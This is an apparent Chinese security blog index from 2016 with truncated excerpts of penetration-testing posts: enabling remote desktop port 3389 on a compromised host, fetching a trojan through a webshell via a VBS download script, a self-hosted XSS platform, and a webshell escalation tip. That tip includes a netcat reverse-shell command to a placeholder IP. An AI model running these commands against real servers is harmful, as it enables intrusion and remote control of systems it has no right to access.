1 Web安全与渗透 2016-03-25 通过Dos命令查询和开启3389端口 渗透过程中,关掉防火墙,直接就查看远程端口,如果未开启,就用命令开启,并尝试远程登陆连接。 显然,这种方法在实际渗透中都不常使用了,多数都是通过端口转发的方式的方式链接。 具体方法如下: 注:主要是通过向服务器注册表查询关键值查看状态。查询 3389端口是否被更改,查出的数... 阅读全文
2 小折腾/小配置 2016-03-24 linux上一键安装VPN脚本 按行执行命令: wget https://www.jozxing.cc/vpn/vpn.shchmod a+x vpn.sh然后出现: which do you want to?input the number. 1. install VPN service 2. repa... 阅读全文
3 小折腾/小配置 2016-03-21 XSS平台和谷歌 最近两天在搞国外的VPS,搭建了XSS平台。 url:xss.jozxing.cc 需要注册使用的留言。谷歌地址:google.jozxing.cc 阅读全文
4 小折腾/小配置 2016-03-18 openshift一键搭建反向代理谷歌 1.首先,需要在openshift上创建一个diy项目,这里不多说。然后用putty连接22端口到此项目,便于远程命令执行。 2.通过putty执行命令: ①cd /tmp ②wget --no-check-certificate https://www.jozxing.c... 阅读全文
5 Web安全与渗透 2016-03-15 windows电脑使用Filezilla 连接Openshift免费空间方法 1.先下载PuttyGen,主要用来生成公钥和导出私钥 2.复制密钥到Openshift的Settings里面。 3.然后用Filezilla连接的时候,选择PPK后缀名的私钥。 4.直接链接,私钥切勿删除,可放在Filezilla目录下。 阅读全文
6 Web安全与渗透 2016-03-07 windows用DOS下载文件的多种姿势 有时候通过webshell会遇到无法上传马的现象,那么,可以试试通过shell创建个文件,然后后缀名为vbs,通过vbs脚本下载远程木马。下载后,通过webshell的命令执行尝试。代码如下:-----------------------------------------... 阅读全文
7 Web安全与渗透 2016-03-07 Webshell 提权小技巧 Cmd路径:c:\windows\temp\cmd.exe Nc 也在同目录下,例如反弹cmdshell: “c:\windows\temp\nc.exe -vv ip 999 -e c:\windows\temp\cmd.exe”通常都不会成功。而直接在 cmd 路径上输... 阅读全文